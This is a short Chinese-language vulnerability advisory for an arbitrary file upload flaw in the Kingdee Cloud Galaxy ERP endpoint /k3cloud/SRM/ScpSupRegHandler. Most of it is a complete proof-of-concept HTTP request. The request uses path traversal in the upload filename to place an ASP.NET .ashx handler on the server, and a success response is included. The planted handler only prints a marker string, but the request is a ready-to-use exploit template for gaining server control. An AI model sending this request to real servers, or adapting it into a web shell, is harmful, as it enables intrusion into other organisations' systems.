漏洞描述
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。2023年11月,互联网上披露金蝶云星空任意文件上传漏洞情报,攻击者可利用该漏洞上传任意文件,获取服务器控制权限。
金蝶云星空 /ScpSupRegHandler 路径存在任意文件上传漏洞
PoC代码
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 872
Content-Type: multipart/form-data; boundary=40b740aec07d704d4b1bfcbd39e74a57
--40b740aec07d704d4b1bfcbd39e74a57
Content-Disposition: form-data; name="dbId_v"
.
--40b740aec07d704d4b1bfcbd39e74a57
Content-Disposition: form-data; name="FID"
2022
--40b740aec07d704d4b1bfcbd39e74a57
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/90c25edcf7876b866423957be777ee20.AsHx."
Content-Type: text/plain
<%@ WebHandler Language="C#" Class="TestHandler" %>
using System;
using System.Web;
public class TestHandler : IHttpHandler {
public void
ProcessRequest (HttpContext context) {
context.Response.ContentType= "text/plain";
context.Response.Write("ea79db2085639bba76b3f64eeeccc7dc");
}
public bool IsReusable {
get {return false; }
}
}
--40b740aec07d704d4b1bfcbd39e74a57--
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2025 03:19:13 GMT
Content-Length: 60
{
"IsSuccess": true,
"Msg": "附件保存成功!"
}